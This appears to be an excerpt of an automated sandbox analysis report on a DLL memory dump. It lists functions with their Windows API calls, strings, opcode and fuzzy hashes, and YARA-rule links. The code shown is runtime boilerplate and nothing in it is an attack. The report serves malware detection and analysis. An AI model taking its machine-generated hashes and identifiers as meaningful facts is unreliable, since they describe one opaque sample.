Associated: 00000001.00000002.622320278.000000006EA00000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.622348727.000000006EA3A000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.622358738.000000006EA4C000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.622366010.000000006EA4F000.00000002.00020000.sdmp Download File

Similarity

API ID: Unothrow_t@std@@@Window__ehfuncinfo$??2@$ActiveClipboardCountForegroundNumberSequenceTick
String ID:
API String ID: 4254224021-0
Opcode ID: 25f373bc376c0988eb254d0cc489e9ac471b0e82185ce4648db3cc90fab4c980
Instruction ID: 7c962d6faad9ea53c724190962b2d82c2af3d066d998549402b8e0c8d82438ea
Opcode Fuzzy Hash: 25f373bc376c0988eb254d0cc489e9ac471b0e82185ce4648db3cc90fab4c980
Instruction Fuzzy Hash: 5E512D31D307184AD723A7B2E14516EB25E5F9B29CB28CB23E401FB2A5FF2568D25984

Uniqueness

Uniqueness Score: -1.00%

Function 6EA07D80, Relevance: 6.1, APIs: 4, Instructions: 121COMMON

Download Yara Rule

APIs

SysStringLen.OLEAUT32(?), ref: 6EA07DB1

Memory Dump Source

Source File: 00000001.00000002.622323827.000000006EA01000.00000020.00020000.sdmp, Offset: 6EA00000, based on PE: true

Associated: 00000001.00000002.622320278.000000006EA00000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.622348727.000000006EA3A000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.622358738.000000006EA4C000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.622366010.000000006EA4F000.00000002.00020000.sdmp Download File

Similarity

API ID: String
String ID:
API String ID: 2568140703-0
Opcode ID: c93917551e2a83e279d03a3172f8cf933011d4103725d95c42bfedbdf4302b99
Instruction ID: f304d1e107131466627b10c102a87748e558beca91b73f9f9e21253368b1a986
Opcode Fuzzy Hash: c93917551e2a83e279d03a3172f8cf933011d4103725d95c42bfedbdf4302b99
Instruction Fuzzy Hash: A631F432B053155B9F08DEAEE49157ABBE5EF84770714827EEC05DB284EB31DC90CA84

Uniqueness

Uniqueness Score: -1.00%

Function 6EA07E90, Relevance: 6.0, APIs: 4, Instructions: 28COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32 ref: 6EA07E97
VariantCopy.OLEAUT32(?,?), ref: 6EA07EA1
_com_issue_error.COMSUPP ref: 6EA07EB3
VariantClear.OLEAUT32 ref: 6EA07EC1

Memory Dump Source

Source File: 00000001.00000002.622323827.000000006EA01000.00000020.00020000.sdmp, Offset: 6EA00000, based on PE: true

Associated: 00000001.00000002.622320278.000000006EA00000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.622348727.000000006EA3A000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.622358738.000000006EA4C000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.622366010.000000006EA4F000.00000002.00020000.sdmp Download File

Similarity

API ID: Variant$ClearCopyInit_com_issue_error
String ID:
API String ID: 309108855-0
Opcode ID: da0bdefd2a2b7b483bf9bdc0e6852da7d2617a24cf10ffa9ea2df997ceb6ad3a
Instruction ID: 1928bd7484afe301298a2366c0d55435ada0c7d132e177e2f815041bd3d047b3
Opcode Fuzzy Hash: da0bdefd2a2b7b483bf9bdc0e6852da7d2617a24cf10ffa9ea2df997ceb6ad3a
Instruction Fuzzy Hash: 06D05E723016356B8E216BE5DC0CDCB7A1DEE022693008822F704D6100EBB5C98187F8

Uniqueness

Uniqueness Score: -1.00%

Function 6EA2598D, Relevance: 6.0, APIs: 4, Instructions: 19COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 6EA25996

Part of subcall function 6EA28252: HeapFree.KERNEL32(00000000,00000000,?,6EA33A72,?,00000000,?,?,?,6EA33D17,?,00000007,?,?,6EA31D29,?), ref: 6EA28268
Part of subcall function 6EA28252: GetLastError.KERNEL32(?,?,6EA33A72,?,00000000,?,?,?,6EA33D17,?,00000007,?,?,6EA31D29,?,?), ref: 6EA2827A

_free.LIBCMT ref: 6EA259A9
_free.LIBCMT ref: 6EA259BA
_free.LIBCMT ref: 6EA259CB

Memory Dump Source

Source File: 00000001.00000002.622323827.000000006EA01000.00000020.00020000.sdmp, Offset: 6EA00000, based on PE: true

Associated: 00000001.00000002.622320278.000000006EA00000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.622348727.000000006EA3A000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.622358738.000000006EA4C000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.622366010.000000006EA4F000.00000002.00020000.sdmp Download File

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 00878b7f54268229dc5486f8de6c7e630206e7ee367465fe4664b37a068ae9e4
Instruction ID: 3638e632306bef640782525fa6457046ea116f49f0dde11bed6bb02beb76f994
Opcode Fuzzy Hash: 00878b7f54268229dc5486f8de6c7e630206e7ee367465fe4664b37a068ae9e4
Instruction Fuzzy Hash: 2EE09AB2494F20DA9F25BF5896004893BA5EF9A618359C86AF4103E254C73B0993DFD6

Uniqueness

Uniqueness Score: -1.00%

Function 6EA2D75E, Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 230COMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 6EA2D765

Strings

@Mt, xrefs: 6EA2D8CD

Memory Dump Source

Source File: 00000001.00000002.622323827.000000006EA01000.00000020.00020000.sdmp, Offset: 6EA00000, based on PE: true

Associated: 00000001.00000002.622320278.000000006EA00000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.622348727.000000006EA3A000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.622358738.000000006EA4C000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.622366010.000000006EA4F000.00000002.00020000.sdmp Download File

Similarity

API ID: H_prolog3_
String ID: @Mt
API String ID: 2427045233-1491384996
Opcode ID: fb106b4824ed51d15f9c5dd19d1059e200c4b78e31c7dc24d038ecf5e0b7cca9
Instruction ID: 1cac4380dfba2b37cb6811fa6924e37e60147964f20cf10f52e3769a52092329
Opcode Fuzzy Hash: fb106b4824ed51d15f9c5dd19d1059e200c4b78e31c7dc24d038ecf5e0b7cca9
Instruction Fuzzy Hash: A5719F71D042169FDB208BD5C980BEEBA79AF4A314F1D453AE82077682D7358CC2CF68

Uniqueness

Uniqueness Score: -1.00%

Function 6EA0BD70, Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 202COMMON

Download Yara Rule

APIs

__floor_pentium4.LIBCMT ref: 6EA0BEED
std::_Xinvalid_argument.LIBCPMT ref: 6EA0BFAC

Strings

unordered_map/set too long, xrefs: 6EA0BFA7

Memory Dump Source

Source File: 00000001.00000002.622323827.000000006EA01000.00000020.00020000.sdmp, Offset: 6EA00000, based on PE: true

Associated: 00000001.00000002.622320278.000000006EA00000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.622348727.000000006EA3A000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.622358738.000000006EA4C000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.622366010.000000006EA4F000.00000002.00020000.sdmp Download File

Similarity

API ID: Xinvalid_argument__floor_pentium4std::_
String ID: unordered_map/set too long
API String ID: 3194428529-306623848
Opcode ID: 47f9dc5f2c77ca99f289799e4050fef0da74e0253a9e469288a590ceb3583a74
Instruction ID: 5cf169291fc6c5f1ff1dcd49357481f267cb4e8f87543fe0241687f0386b803d
Opcode Fuzzy Hash: 47f9dc5f2c77ca99f289799e4050fef0da74e0253a9e469288a590ceb3583a74
Instruction Fuzzy Hash: B071BD71A00709CFCB11CFA9D590A9AFBF4FF49318F24866AE445AB340E731A981CF94

Uniqueness

Uniqueness Score: -1.00%

Function 6EA278ED, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 194COMMON

Download Yara Rule

APIs

__startOneArgErrorHandling.LIBCMT ref: 6EA2797D

Strings

pow, xrefs: 6EA27955, 6EA27972

Memory Dump Source

Source File: 00000001.00000002.622323827.000000006EA01000.00000020.00020000.sdmp, Offset: 6EA00000, based on PE: true

Associated: 00000001.00000002.622320278.000000006EA00000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.622348727.000000006EA3A000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.622358738.000000006EA4C000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.622366010.000000006EA4F000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorHandling__start
String ID: pow
API String ID: 3213639722-2276729525
Opcode ID: 06139c4e8a6b83a8b3bd1d663672e50de19b5c826caebc127c62bbced3027ca8
Instruction ID: 64cf6a013f6b929293f043107b67faf3cc15617daa1ef34ac7904fa0e5efed17
Opcode Fuzzy Hash: 06139c4e8a6b83a8b3bd1d663672e50de19b5c826caebc127c62bbced3027ca8
Instruction Fuzzy Hash: 67517C71A183028ECB8167D4C91176937A4DB51750F3CCEA8F0A1E62D8EB358DD98A4E

Uniqueness

Uniqueness Score: -1.00%

Function 6EA139A0, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 186COMMON

Download Yara Rule

APIs

__floor_pentium4.LIBCMT ref: 6EA13AE2
std::_Xinvalid_argument.LIBCPMT ref: 6EA13BAB

Strings

unordered_map/set too long, xrefs: 6EA13BA6

Memory Dump Source

Source File: 00000001.00000002.622323827.000000006EA01000.00000020.00020000.sdmp, Offset: 6EA00000, based on PE: true

Associated: 00000001.00000002.622320278.000000006EA00000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.622348727.000000006EA3A000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.622358738.000000006EA4C000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.622366010.000000006EA4F000.00000002.00020000.sdmp Download File

Similarity

API ID: Xinvalid_argument__floor_pentium4std::_
String ID: unordered_map/set too long
API String ID: 3194428529-306623848
Opcode ID: 68d62c92a37706b0f766a429384686c17adbd587eb2ff31593c1f7a9f40b5126
Instruction ID: de7f2818e4d84a011e2106bedf9ec822e9fbe18ed7741a8b154de6b02a1750ef
Opcode Fuzzy Hash: 68d62c92a37706b0f766a429384686c17adbd587eb2ff31593c1f7a9f40b5126
Instruction Fuzzy Hash: EF61D070A0860ADFCB04CFA9C444AAEFBB5FF49314F24866AD445BB340E731E885CB94

Uniqueness

Uniqueness Score: -1.00%

Function 6EA2FBEF, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 127COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 6EA2FD0C
__dosmaperr.LIBCMT ref: 6EA2FD13

Strings

@Mt, xrefs: 6EA2FD0C

Memory Dump Source

Source File: 00000001.00000002.622323827.000000006EA01000.00000020.00020000.sdmp, Offset: 6EA00000, based on PE: true

Associated: 00000001.00000002.622320278.000000006EA00000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.622348727.000000006EA3A000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.622358738.000000006EA4C000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.622366010.000000006EA4F000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLast__dosmaperr
String ID: @Mt
API String ID: 1659562826-1491384996
Opcode ID: db6d3660e28f8b50f225ac2f2c9ffffaacf1015f4c738454bb968abde103e0b7
Instruction ID: dabba8b0f9895005cbd951bfe4a580037803c66caf0b3ebe81e17c9e7279c74b
Opcode Fuzzy Hash: db6d3660e28f8b50f225ac2f2c9ffffaacf1015f4c738454bb968abde103e0b7
Instruction Fuzzy Hash: 6241AB79504255AFEB118FA8C880AA97FE5EF46308F3C467CEC84BB245D3318D92C798

Uniqueness

Uniqueness Score: -1.00%

Function 6EA250A9, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 124COMMON

Download Yara Rule

Strings

C:\Windows\SYSTEM32\loaddll32.exe, xrefs: 6EA250EC, 6EA250F3, 6EA25129

Memory Dump Source

Source File: 00000001.00000002.622323827.000000006EA01000.00000020.00020000.sdmp, Offset: 6EA00000, based on PE: true

Associated: 00000001.00000002.622320278.000000006EA00000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.622348727.000000006EA3A000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.622358738.000000006EA4C000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.622366010.000000006EA4F000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID: C:\Windows\SYSTEM32\loaddll32.exe
API String ID: 0-1872383224
Opcode ID: 091a78799120e5305fc9161113a5fd79f1a87a9c78d45dab8158d3716736f946
Instruction ID: 72993795974a2500954120b01d64e5ef24a2fe2df78b7847f0580ec6bbf334f9
Opcode Fuzzy Hash: 091a78799120e5305fc9161113a5fd79f1a87a9c78d45dab8158d3716736f946
Instruction Fuzzy Hash: 3B41B4B0A40614AFDB15EBD98D809DEBBFDFF85304B2C4476E404BB204D7718A81DB5A

Uniqueness

Uniqueness Score: -1.00%

Function 6EA1A1E4, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 112COMMON

Download Yara Rule

APIs

EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 6EA1A209

Strings

RCC, xrefs: 6EA1A223
MOC, xrefs: 6EA1A21B

Memory Dump Source

Source File: 00000001.00000002.622323827.000000006EA01000.00000020.00020000.sdmp, Offset: 6EA00000, based on PE: true

Associated: 00000001.00000002.622320278.000000006EA00000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.622348727.000000006EA3A000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.622358738.000000006EA4C000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.622366010.000000006EA4F000.00000002.00020000.sdmp Download File

Similarity

API ID: EncodePointer
String ID: MOC$RCC
API String ID: 2118026453-2084237596
Opcode ID: 6798b7040245de37c45af50314ac9f8b7abf43841cd0d46176214692fb49f7d5
Instruction ID: b9dadffafb491a6479f49303e97f5de0b2c3fdabcdb8f780ac8738eadd7fabdf
Opcode Fuzzy Hash: 6798b7040245de37c45af50314ac9f8b7abf43841cd0d46176214692fb49f7d5
Instruction Fuzzy Hash: 44419C71908209AFDF02CFD4CE80AEE7BB6FF09304F188058F905A7261D3369995CB55

Uniqueness

Uniqueness Score: -1.00%

Function 6EA2EAD4, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 105fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNEL32(?,?,00000000,?,00000000,6EA2EE15,6EA2685B,00000001,00000000,6EA26918,?,?,?,6EA2685B,?,00000000), ref: 6EA2EBBD
GetLastError.KERNEL32(6EA2EE15,6EA2685B,00000001,00000000,6EA26918,?,?,?,6EA2685B,?,00000000,00000000,6EA4A338,0000002C,6EA26918,?), ref: 6EA2EBED

Strings

@Mt, xrefs: 6EA2EBED

Memory Dump Source

Source File: 00000001.00000002.622323827.000000006EA01000.00000020.00020000.sdmp, Offset: 6EA00000, based on PE: true

Associated: 00000001.00000002.622320278.000000006EA00000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.622348727.000000006EA3A000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.622358738.000000006EA4C000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.622366010.000000006EA4F000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorFileLastWrite
String ID: @Mt
API String ID: 442123175-1491384996
Opcode ID: af0ca7089a84f643f0ef12e8e996313be0283dc428e4387430fd763ee1ca77d2
Instruction ID: d0ed5b9a9ce2d81361eb271475aa9444f08b2d70746abaf17b4af4b46bbcb1f2
Opcode Fuzzy Hash: af0ca7089a84f643f0ef12e8e996313be0283dc428e4387430fd763ee1ca77d2
Instruction Fuzzy Hash: 69317571A00219AFEB15CF69CC81AE973B5EB45300F1880BAE50AE7290D771EDC5CB65

Uniqueness

Uniqueness Score: -1.00%

Function 6EA11540, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 84COMMON

Download Yara Rule

APIs

InitializeCriticalSectionEx.KERNEL32(00000008,00000000,00000000), ref: 6EA115AD
GetLastError.KERNEL32 ref: 6EA115B7

Strings

@Mt, xrefs: 6EA115B7

Memory Dump Source

Source File: 00000001.00000002.622323827.000000006EA01000.00000020.00020000.sdmp, Offset: 6EA00000, based on PE: true

Associated: 00000001.00000002.622320278.000000006EA00000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.622348727.000000006EA3A000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.622358738.000000006EA4C000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.622366010.000000006EA4F000.00000002.00020000.sdmp Download File

Similarity

API ID: CriticalErrorInitializeLastSection
String ID: @Mt
API String ID: 3413597225-1491384996
Opcode ID: 1c28b5f342f0464fad7bd75ee3e57ca6b02741db1fb7701d00f3e462ba2dca17
Instruction ID: 7e85b1e7b0116e2d1d1dddba97de2bb69e1648c7d1f7f9990992491c71469fd0
Opcode Fuzzy Hash: 1c28b5f342f0464fad7bd75ee3e57ca6b02741db1fb7701d00f3e462ba2dca17
Instruction Fuzzy Hash: 09213B365087128BD7118EA6C804B977BE6AFF5764F15451DE859CB300EB71D8C583D8

Uniqueness

Uniqueness Score: -1.00%

Function 6EA2E9E9, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 83fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNEL32(?,?,?,?,00000000,00000000,00000001,00000000,?,6EA2EE05,6EA2685B,00000001,00000000,6EA26918,?,?), ref: 6EA2EA93
GetLastError.KERNEL32(?,6EA2EE05,6EA2685B,00000001,00000000,6EA26918,?,?,?,6EA2685B,?,00000000,00000000,6EA4A338,0000002C,6EA26918), ref: 6EA2EAB9

Strings

@Mt, xrefs: 6EA2EAB9

Memory Dump Source

Source File: 00000001.00000002.622323827.000000006EA01000.00000020.00020000.sdmp, Offset: 6EA00000, based on PE: true

Associated: 00000001.00000002.622320278.000000006EA00000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.622348727.000000006EA3A000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.622358738.000000006EA4C000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.622366010.000000006EA4F000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorFileLastWrite
String ID: @Mt
API String ID: 442123175-1491384996
Opcode ID: 67fd45070652bb9886e40456b35272663ef43e6890fd99395c5eb9a8ff75e136
Instruction ID: d5fea100fd71d808350441e34f560b260c576ad2eb4ec703dc59b187034fb601
Opcode Fuzzy Hash: 67fd45070652bb9886e40456b35272663ef43e6890fd99395c5eb9a8ff75e136
Instruction Fuzzy Hash: E7318131A002199FDF25CF69CC809DAB3B5FF49315B1885B9E909EB250D7309DC5CA95

Uniqueness

Uniqueness Score: -1.00%

Function 6EA2E90C, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 81fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNEL32(?,?,?,?,00000000,00000000,00000001,00000000,?,6EA2EE25,6EA2685B,00000001,00000000,6EA26918,?,?), ref: 6EA2E9A8
GetLastError.KERNEL32(?,6EA2EE25,6EA2685B,00000001,00000000,6EA26918,?,?,?,6EA2685B,?,00000000,00000000,6EA4A338,0000002C,6EA26918), ref: 6EA2E9CE

Strings

@Mt, xrefs: 6EA2E9CE

Memory Dump Source

Source File: 00000001.00000002.622323827.000000006EA01000.00000020.00020000.sdmp, Offset: 6EA00000, based on PE: true

Associated: 00000001.00000002.622320278.000000006EA00000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.622348727.000000006EA3A000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.622358738.000000006EA4C000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.622366010.000000006EA4F000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorFileLastWrite
String ID: @Mt
API String ID: 442123175-1491384996
Opcode ID: e79971fa1344e0059ac51be424b8975a77ffb86675f6f832f7aa10e8fcceff84
Instruction ID: f361839c8d1584b7c5a35fe295076219e31eb167bef4350bb5c080fd4a320d63
Opcode Fuzzy Hash: e79971fa1344e0059ac51be424b8975a77ffb86675f6f832f7aa10e8fcceff84
Instruction Fuzzy Hash: 6021A731A002199FDF16CF6ACC809D9B7B9EB49301F1481BAE949E7211D630DDC6CF65

Uniqueness

Uniqueness Score: -1.00%

Function 6EA27B39, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 73COMMON

Download Yara Rule

APIs

Part of subcall function 6EA27C0A: _free.LIBCMT ref: 6EA27C18

Part of subcall function 6EA2C78F: MultiByteToWideChar.KERNEL32(6EA2C5A6,00000100,E8458D00,00000000,00000000,00000020,?,6EA2DDB4,00000000,00000000,00000100,00000020,00000000,00000000,E8458D00,00000100), ref: 6EA2C7FF

GetLastError.KERNEL32 ref: 6EA27B9D
__dosmaperr.LIBCMT ref: 6EA27BA4

Strings

@Mt, xrefs: 6EA27B9D

Memory Dump Source

Source File: 00000001.00000002.622323827.000000006EA01000.00000020.00020000.sdmp, Offset: 6EA00000, based on PE: true

Associated: 00000001.00000002.622320278.000000006EA00000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.622348727.000000006EA3A000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.622358738.000000006EA4C000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.622366010.000000006EA4F000.00000002.00020000.sdmp Download File

Similarity

API ID: ByteCharErrorLastMultiWide__dosmaperr_free
String ID: @Mt
API String ID: 4030486722-1491384996
Opcode ID: 748eb8855d15336df220cf7a07c59bdace6b9471032a1c56b9de8318752becce
Instruction ID: 359e2495d07c22834d86e8aeb2f92cc258ce92184e6d36ee4144619057e60769
Opcode Fuzzy Hash: 748eb8855d15336df220cf7a07c59bdace6b9471032a1c56b9de8318752becce
Instruction Fuzzy Hash: F221EB31504616AFDB118FA6CD00E4B77A9EF81324F1C4534F929B76D0D732EA80C798

Uniqueness

Uniqueness Score: -1.00%

Function 6EA2E36C, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 41COMMON

Download Yara Rule

APIs

Part of subcall function 6EA352BC: EnterCriticalSection.KERNEL32(00000001,?,6EA2EC6C,?,6EA4A680,00000010,6EA269BD,00000000,00000000,?,?,?,?,6EA26A01,?,00000000), ref: 6EA352D7

FlushFileBuffers.KERNEL32(00000000,6EA4A660,0000000C,6EA2E469,6EA26918,?,00000001,?,6EA26918,?), ref: 6EA2E3B5
GetLastError.KERNEL32 ref: 6EA2E3C6

Strings

@Mt, xrefs: 6EA2E3C6

Memory Dump Source

Source File: 00000001.00000002.622323827.000000006EA01000.00000020.00020000.sdmp, Offset: 6EA00000, based on PE: true

Associated: 00000001.00000002.622320278.000000006EA00000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.622348727.000000006EA3A000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.622358738.000000006EA4C000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.622366010.000000006EA4F000.00000002.00020000.sdmp Download File

Similarity

API ID: BuffersCriticalEnterErrorFileFlushLastSection
String ID: @Mt
API String ID: 4109680722-1491384996
Opcode ID: 7472b1c7983439b958c089befb107a2be9f2bacf034374d101922296948165a5
Instruction ID: cf7bbef57428d61c4772e6f33792f15bf48dd710a6e95affef1e4558f9e696c1
Opcode Fuzzy Hash: 7472b1c7983439b958c089befb107a2be9f2bacf034374d101922296948165a5
Instruction Fuzzy Hash: 5C018471910724CFCB119FF8CA04A8D7BA9AF06724B15856AF414FF390D774D982CB48

Uniqueness

Uniqueness Score: -1.00%

Function 6EA018B0, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 27COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 6EA018B5

Part of subcall function 6EA152A1: std::invalid_argument::invalid_argument.LIBCONCRT ref: 6EA152AD

___std_exception_copy.LIBVCRUNTIME ref: 6EA018DE

Strings

string too long, xrefs: 6EA018B0

Memory Dump Source

Source File: 00000001.00000002.622323827.000000006EA01000.00000020.00020000.sdmp, Offset: 6EA00000, based on PE: true

Associated: 00000001.00000002.622320278.000000006EA00000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.622348727.000000006EA3A000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.622358738.000000006EA4C000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.622366010.000000006EA4F000.00000002.00020000.sdmp Download File

Similarity

API ID: Xinvalid_argument___std_exception_copystd::_std::invalid_argument::invalid_argument
String ID: string too long
API String ID: 1846318660-2556327735
Opcode ID: acca7e1759eecaf0cfdbd5bc6355a99a5b71054c37cc111864dfe19025b78aed
Instruction ID: 83807f4c4cb063b6cb63f543d4dc2d91da27681e3aef27091f6e11a2ad73b69d
Opcode Fuzzy Hash: acca7e1759eecaf0cfdbd5bc6355a99a5b71054c37cc111864dfe19025b78aed
Instruction Fuzzy Hash: 63E08CB29242295BCB109FD8EC018C6B69E9F16258324892AF644EB600E670E8C083A8

Uniqueness

Uniqueness Score: -1.00%

Function 6EA01000, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 23COMMON

Download Yara Rule

APIs

InitializeCriticalSectionEx.KERNEL32(6EA4CA3C,00000000,00000000), ref: 6EA01009
GetLastError.KERNEL32 ref: 6EA01013

Strings

@Mt, xrefs: 6EA01013

Memory Dump Source

Source File: 00000001.00000002.622323827.000000006EA01000.00000020.00020000.sdmp, Offset: 6EA00000, based on PE: true

Associated: 00000001.00000002.622320278.000000006EA00000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.622348727.000000006EA3A000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.622358738.000000006EA4C000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.622366010.000000006EA4F000.00000002.00020000.sdmp Download File

Similarity

API ID: CriticalErrorInitializeLastSection
String ID: @Mt
API String ID: 3413597225-1491384996
Opcode ID: 6fcd82f9c156f0c49cd271ed14aea7ba93851948d01f5be392d3e1f8d4cddb1c
Instruction ID: 159465584e45470d0ec57a11697b333829d6ca6fcb34595689dae98e71d5a25a
Opcode Fuzzy Hash: 6fcd82f9c156f0c49cd271ed14aea7ba93851948d01f5be392d3e1f8d4cddb1c
Instruction Fuzzy Hash: 55E086682047E08AFB10AEE55E087D5269A271235DF21C819E086FC5C0DB6981C9AA2D

Uniqueness

Uniqueness Score: -1.00%

Function 6EA010B0, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON

Download Yara Rule

APIs

InitializeCriticalSectionEx.KERNEL32(6EA4E348,00000000,00000000), ref: 6EA010C3
GetLastError.KERNEL32 ref: 6EA010CD

Strings

@Mt, xrefs: 6EA010CD

Memory Dump Source

Source File: 00000001.00000002.622323827.000000006EA01000.00000020.00020000.sdmp, Offset: 6EA00000, based on PE: true

Associated: 00000001.00000002.622320278.000000006EA00000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.622348727.000000006EA3A000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.622358738.000000006EA4C000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.622366010.000000006EA4F000.00000002.00020000.sdmp Download File

Similarity

API ID: CriticalErrorInitializeLastSection
String ID: @Mt
API String ID: 3413597225-1491384996
Opcode ID: 3d1f728a4e891461133f00879d8d96a4a92df7d3a3e4ee0d60c67227b44921db
Instruction ID: 7b69b4fec73d42671707c212cb6b967bfe6e330b66cf738537561466fd1d1545
Opcode Fuzzy Hash: 3d1f728a4e891461133f00879d8d96a4a92df7d3a3e4ee0d60c67227b44921db
Instruction Fuzzy Hash: 56E04874214790CAFB12DFE69A45B9536D5671270CF25C008E585ED180D77790C9971D

Uniqueness

Uniqueness Score: -1.00%

Function 6EA17089, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON

Download Yara Rule

APIs

Part of subcall function 6EA07BA0: InitializeCriticalSectionEx.KERNEL32(?,00000000,00000000,?,6EA4A8C4), ref: 6EA07BA5
Part of subcall function 6EA07BA0: GetLastError.KERNEL32(?,00000000,00000000,?,6EA4A8C4), ref: 6EA07BAF

IsDebuggerPresent.KERNEL32(?,?,?,6EA011DF), ref: 6EA170BC
OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,6EA011DF), ref: 6EA170CB

Strings

ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 6EA170C6

Memory Dump Source

Source File: 00000001.00000002.622323827.000000006EA01000.00000020.00020000.sdmp, Offset: 6EA00000, based on PE: true

Associated: 00000001.00000002.622320278.000000006EA00000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.622348727.000000006EA3A000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.622358738.000000006EA4C000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.622366010.000000006EA4F000.00000002.00020000.sdmp Download File

Similarity

API ID: CriticalDebugDebuggerErrorInitializeLastOutputPresentSectionString
String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
API String ID: 3511171328-631824599
Opcode ID: a16c75306c079271ad605f0d17bb95b53ab8959fd158f29ac29e21c6a03e4b6b
Instruction ID: 22db00fcdca827515eee8a07437e2202a8e13d19a69ddcf62756f8a4bf87ca8f
Opcode Fuzzy Hash: a16c75306c079271ad605f0d17bb95b53ab8959fd158f29ac29e21c6a03e4b6b
Instruction Fuzzy Hash: 4FE06D70104B618FD730EFA8D404386BBE9AF02308F01CE1CE496DA680EBB1D4C98B59

Uniqueness

Uniqueness Score: -1.00%

Function 6EA01060, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19COMMON

Download Yara Rule

APIs

InitializeCriticalSectionEx.KERNEL32(6EA4CA58,00000000,00000000), ref: 6EA01069
GetLastError.KERNEL32 ref: 6EA01073

Strings

@Mt, xrefs: 6EA01073

Memory Dump Source

